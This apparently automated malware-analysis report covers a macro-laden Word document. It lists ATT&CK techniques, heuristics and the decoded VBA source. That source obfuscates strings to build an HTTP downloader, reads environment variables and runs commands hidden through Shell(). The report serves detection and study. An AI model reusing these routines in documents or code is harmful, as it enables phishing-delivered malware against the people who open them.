Verdict: MALICIOUS
Risk Score: 170
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1204.002 Malicious File
T1140 Deobfuscate/Decode Files or Information
The sample contains VBA macros that utilize `Shell()` and `CreateObject()` calls, indicating an attempt to execute arbitrary code. The VBA script attempts to download content from a URL using `MSXML2.ServerXMLHTTP` and `CreateObject`. The document body presents a lure to encourage macro execution. The presence of `Environ()` calls suggests potential interaction with environment variables.
Heuristics (7)

- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call
- Environ() call (env variable access) (low) OLE_VBA_ENVIRON: Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure (medium) SE_ENABLE_LURE: Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/rights/ (in document text, OLE body)
  - http://www.iec.ch (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3554 bytes |

SHA-256: 8a499abb5bf0aa9ba72b8cc7b9151cf5e1ca98f44127612f7665f3ca47641c0f
Preview script: first 1,000 lines of the extracted script (three modules concatenated; indentation and explanatory comments added for readability, the macro code itself is unchanged)

```vba
Attribute VB_Name = "Module1"
Public Function Xjdkhjfwefw(a As Object)
    ' Returns the response body of a completed XMLHTTP request object
    Xjdkhjfwefw = (a.responseText)
End Function

Attribute VB_Name = "Module2"
Public Function Goabc(sps As String)
    BHJQVDQWVSS = "g21he 2g1hcf1c12e"
    BHJQVDQWVSS = "g21he 2g1hcf1c12e"
    BHJQVDQWVSS = "g21he 2g1hcf1c12e"
    ' Thin wrapper around Environ(): reads the named environment variable
    Goabc = Environ(sps)
End Function

Public Function Linolium(nbqjbdjqw As String)
    Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, VjwiqdhqkwjHJhjkahsdjsakDD As Object, AHUDWQI As String
    Dim ashdUHhda As String, hausd As Integer, JQHWDJQWB As String
    ashdUHhda = nbqjbdjqw
    ' Tan(11) is roughly -225.95, so hausd rounds to -1 when stored as Integer.
    ' The Chr() arithmetic below then builds "GET" and "MSXML2.ServerXMLHTTP";
    ' the arithmetic exists only to keep those strings out of the static source.
    hausd = Tan(11) + 225
    'asdsad
    JQHWDJQWB = "E"
    JQHWDJQWB = "G" + JQHWDJQWB + Chr(88 + 4 * hausd)
    BQDHJQWDGWQJGS = "MS" + Chr(93 + 5 * hausd) + "ML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
    'Hukqjdhjksahd
    ' Issues an HTTP GET to the URL passed in and returns the response body
    Set VjwiqdhqkwjHJhjkahsdjsakDD = CreateObject(BQDHJQWDGWQJGS)
    VjwiqdhqkwjHJhjkahsdjsakDD.Open JQHWDJQWB, ashdUHhda
    VjwiqdhqkwjHJhjkahsdjsakDD.Send (AHUDWQI)
    Linolium = Module1.Xjdkhjfwefw(VjwiqdhqkwjHJhjkahsdjsakDD)
End Function

Sub Crispy(NumOfSeconds As Long)
    ' Busy-wait delay loop driven by Timer (keeps the UI responsive via DoEvents)
    Dim SngSec As Long
    SngSec = Timer + NumOfSeconds
    Do While Timer < SngSec
        DoEvents
    Loop
End Sub

Attribute VB_Name = "Module3"
' Locates the text between the markers dnuwhd and b in the active document.
' c = 1 deletes that span, c = 2 recolours it black, c = 3 runs a find/replace
' over the document with QHUDW (a single space) as the replacement text.
Public Function India(dnuwhd As String, b As String, c As Integer)
    Dim telnasdhS As String
    ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
    ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
    Dim kkqhwdjbqhjdwqbdhjqwbdjqsd As Range, aaHRjkasnjkdaksbdasdsd As Range
    Set kkqhwdjbqhjdwqbdhjqwbdjqsd = ActiveDocument.Range
    ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1qhwdjko2ej1l2kje k2l1"
    ASJDQDBBBNS = "2jke hjk1g hj12ge1asjdqk2 e1o2ej1l2kje k2l1"
    ASJADQDBBBNS = "2jke hjk1g hhdjkqwj12ge1k2 e1o2ej1l2kje k2l1"
    AFWSJDQDBBBNS = "2jke hjbasjdk1g hj12ge1k2 e1o2ej1l2kje k2l1"
    With kkqhwdjbqhjdwqbdhjqwbdjqsd.Find
        'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
        'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
        'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
        'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
        ' First marker: find it and collapse the range to its end
        .Text = dnuwhd
        .MatchWholeWord = True
        kkqhwdjbqhjdwqbdhjqwbdjqsd.Find.Execute
        kkqhwdjbqhjdwqbdhjqwbdjqsd.Collapse direction:=wdCollapseEnd
        Dim wdwq As String
        Set aaHRjkasnjkdaksbdasdsd = ActiveDocument.Range
        Dim wdsadwq As String
        aaHRjkasnjkdaksbdasdsd.Start = kkqhwdjbqhjdwqbdhjqwbdjqsd.End
        ' Second marker: the target span ends where this one starts
        .Text = b
        .MatchWholeWord = True
        .Execute
        ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
        ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
        kkqhwdjbqhjdwqbdhjqwbdjqsd.Collapse direction:=wdCollapseStart
        aaHRjkasnjkdaksbdasdsd.End = kkqhwdjbqhjdwqbdhjqwbdjqsd.Start
        If (c = 1) Then
            telnasdhS = aaHRjkasnjkdaksbdasdsd.Delete
        End If
        If (c = 2) Then
            aaHRjkasnjkdaksbdasdsd.Font.Color = wdColorBlack
        End If
        ' hduwaa = -15, Sgn(hduwaa) = -1, so QHUDW = Chr(32) = " "
        Dim hduwaa As Integer
        hduwaa = 1 - 2 ^ 4
        QHUDW = Chr(5 + 5 + 23 + Sgn(hduwaa))
        If (c = 3) Then
            With kkqhwdjbqhjdwqbdhjqwbdjqsd.Find
                ' Note: "a" is never declared or assigned in this function, so the
                ' search text is Empty here (the sample is left as recovered)
                .Text = a
                .Replacement.Text = QHUDW
                'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
                'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
                'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
                'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
                .Wrap = wdFindContinue
                .Execute Replace:=wdReplaceAll
            End With
        End If
    End With
End Function

Public Function HowEver(hqwdugqw As Variant, hasdgja)
    VHJWDQ = "b2nme2b1 hgj12hg21jhg e"
    ' Executes the supplied command string via Shell() with window style 0 (vbHide)
    hqwdugqw = Shell(hasdgja, 0)
    HowEver = hqwdugqw
End Function
```